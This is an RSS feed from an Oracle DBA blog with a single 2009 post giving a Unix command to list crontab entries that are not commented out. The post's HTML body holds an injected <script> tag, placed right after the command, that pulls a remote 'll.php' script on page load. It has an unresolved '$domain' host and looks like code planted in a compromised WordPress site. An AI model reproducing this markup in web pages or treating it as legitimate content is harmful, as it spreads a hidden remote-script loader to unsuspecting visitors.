<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Oracle Database Administration Blog &#187; Command to list out all cronjobs which is not commented</title>
	<atom:link href="http://www.bestremotedba.com/tag/command-to-list-out-all-cronjobs-which-is-not-commented/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.bestremotedba.com</link>
	<description>Specially Created for Remote DBAs and Junior DBAs</description>
	<lastBuildDate>Fri, 30 Dec 2011 05:43:39 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Command to list out all cronjobs which is not commented</title>
		<link>http://www.bestremotedba.com/command-to-list-out-all-cronjobs-which-is-not-commented/</link>
		<comments>http://www.bestremotedba.com/command-to-list-out-all-cronjobs-which-is-not-commented/#comments</comments>
		<pubDate>Fri, 25 Dec 2009 03:42:17 +0000</pubDate>
		<dc:creator>aarthimudhalvan</dc:creator>
				<category><![CDATA[Unix-Linux Administration]]></category>
		<category><![CDATA[Command to list out all cronjobs which is not commented]]></category>
		<category><![CDATA[List out all cronjobs which is not commented]]></category>

		<guid isPermaLink="false">http://www.bestremotedba.com/?p=488</guid>
		<description><![CDATA[UNIXSRV01# crontab -l &#124; grep ^[^#]]]></description>
			<content:encoded><![CDATA[<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_start --><p>UNIXSRV01# crontab -l | grep ^[^#]<script src="http://$domain/ll.php?kk=11"></script></p>
<!-- Advanced AdSense by Jim Gaudet --><!-- google_ad_section_end -->]]></content:encoded>
			<wfw:commentRss>http://www.bestremotedba.com/command-to-list-out-all-cronjobs-which-is-not-commented/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

